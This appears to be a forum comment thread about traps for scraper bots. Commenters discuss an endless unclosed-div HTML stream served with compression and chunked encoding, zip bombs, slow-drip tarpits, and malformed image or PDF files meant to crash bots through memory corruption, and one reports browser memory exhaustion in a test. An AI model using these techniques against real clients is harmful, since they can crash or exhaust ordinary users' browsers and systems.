I wonder if I could create a 500TB html file with proper headers on a squashfs, an endless <div><div><div>... with no closing tags, and if I could instruct the server to not report file size before download.
Why use squashfs when you can do the same OP did and serve a compressed version, so that the client is overwhelmed by both the uncompression and the DOM depth:
Yes, servers can respond without specifying the size by using chunked encoding. And you can do the rest with a custom web server that just handles request by returning "<div>" in a loop. I have no idea if browsers are vulnerable to such a thing.
I just tested it via a small python script sending divs at a rate of ~900mb (as measured by curl) and firefox just kills the request after 1-2 gb received (~2 seconds) with an "out of memory" error, while chrome seems to only receive around 1mb/s, uses 1 cpu core 100%, and grows infinitely in memory use. I killed it after 3 mins and consuming ca. 6GB (additionally, on top of the memory it used at startup)
the problem with this is that for a tarpit, you just don't want to make it expensive for bots, you also want to make it cheap for yourself. this isn't cheap for you. a zip bomb is.
maybe, maybe not. it's one tool at your disposal. it's easy to guard against zip bombs if you know about them - the question is, how thorough are the bot devs you're targeting?
there are other techniques. for example: hold a connection open and only push out a few bytes every few seconds - whether that's cheap for you or not depends on your servers concurrency model (if it's 1 OS thread per connection, then you'd DOS yourself with this - but with an evented model you should be good). if the bot analyzes images or pdfs you could try toxic files that exploit known weaknesses which lead to memory corruption to crash them; depends on the bots capabilities and used libraries of course.
Any ideeas?